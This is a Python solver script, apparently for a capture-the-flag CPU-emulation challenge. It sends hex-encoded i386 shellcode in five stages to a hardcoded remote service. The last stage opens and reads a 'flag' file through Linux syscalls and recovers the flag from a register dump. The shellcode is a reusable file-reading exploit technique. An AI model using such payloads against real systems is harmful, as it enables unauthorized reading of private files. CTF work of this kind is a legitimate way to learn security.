from codez import *


def stage1(r):
    """Stage 1: set every register the prompt names to the value it gives.

    Skips output up to 'below', takes the 'REG=value' lines between the
    first and last line of the next chunk, and emits one `mov reg,value`
    per line (register names lower-cased).  The assembled i386 code is
    sent hex-encoded and newline-terminated, like every other stage.
    """
    r.read('below')
    lines = r.read('input').split("\n")[1:-1]
    pairs = [line.split('=') for line in lines]
    code = ''.join('mov %s,%s\n' % (reg.lower(), value) for reg, value in pairs)
    r.write(asm(code, 'i386').encode('hex') + "\n")


def stage2(r):
    """Stage 2: make `eax + ebp - esp + edx * edi * ebx * esi - ecx` equal
    the requested value.

    The requested value goes into eax and every other register in the
    expression is xor-cleared, so the expression collapses to eax.
    """
    r.read('below')
    val = r.read('input').split('=')[1].split('\n')[0]
    cleared = ['xor %s,%s' % (reg, reg)
               for reg in ['ebp', 'esp', 'edx', 'edi', 'ebx', 'esi', 'ecx']]
    code = 'mov eax,%s\n' % val + '\n'.join(cleared)
    r.write(asm(code, 'i386').encode('hex') + "\n")


# Scans upward from the address substituted for %d until the dword at
# [ebp] is non-zero, then leaves that address in eax.
search_tmpl = ('''
mov ebp,%d
l:
inc ebp
mov eax,[ebp]
test eax,eax
jz l
mov eax,ebp
''')


def stage3(r, addr):
    """Stage 3: find the first non-zero dword at or after *addr*.

    *addr* is formatted into ``search_tmpl``; the loop leaves the matching
    address in eax.
    """
    r.read('input')
    code = asm(search_tmpl % addr, 'i386')
    r.write(code.encode('hex') + "\n")


def stage4(r):
    """Stage 4: plant an int3 (0xcc) one byte below the reported EIP and
    jump to it.

    The EIP is parsed from the text following 'EIP:' in the stage prompt
    and echoed for debugging.
    """
    text = r.read("input")
    eip = text.split('EIP:')[1].strip().split("\n")[0].strip()
    print(eip)
    # eip = 0x1000
    template = ('mov esp,0x2000\n'
                'mov eax,%s\n'
                'dec eax\n'
                'lea ebx,[eax]\n'
                'mov byte [ebx],0xcc\n'
                'jmp eax\n')
    r.write(asm(template % eip, 'i386').encode('hex') + "\n")


# open('flag') and read 128 bytes of it onto the stack (32-bit Linux
# syscalls 5 and 3 via int 80h), then load seven registers from fixed
# stack offsets and stop on int 3.  The call/pop pair gives the address
# of the trailing 'flag' string.
open_t = ('''
jmp f
x:
pop ebp
mov al,5
mov ebx,ebp
int 80h
mov edi,eax
mov ebx,edi
mov ecx,esp
mov edx,128
mov al,3
int 80h
mov eax,[esp+28]
mov ebx,[esp+32]
mov ecx,[esp+36]
mov edx,[esp+40]
mov edi,[esp+44]
mov esi,[esp+48]
mov ebp,[esp+52]
int 3
f:
call x
db 'flag',0
''')


def stage5(r):
    """Stage 5: send the fixed ``open_t`` payload."""
    r.read('input')
    code = asm(open_t, 'i386')
    r.write(code.encode('hex') + "\n")


# Drive the five stages against the challenge service, then rebuild the
# flag from the register dump printed after 'Stage5'.
r = Remote('175.119.158.132', 31337)
stage1(r)
stage2(r)
stage3(r, 0x1000 + 15)
stage4(r)
stage5(r)
r.read('Complete!')
dump_lines = r.read('Stage5').split("\n")[1:-1]
val = dict(line.split(' = ') for line in dump_lines)
flag = 'CPU_Emulati0n_1s_sO'
# Each register holds four flag bytes, packed little-endian in this order.
for reg in ['eax', 'ebx', 'ecx', 'edx', 'edi', 'esi', 'ebp']:
    flag += pack('I', int(val[reg.upper()], 16))
print(flag)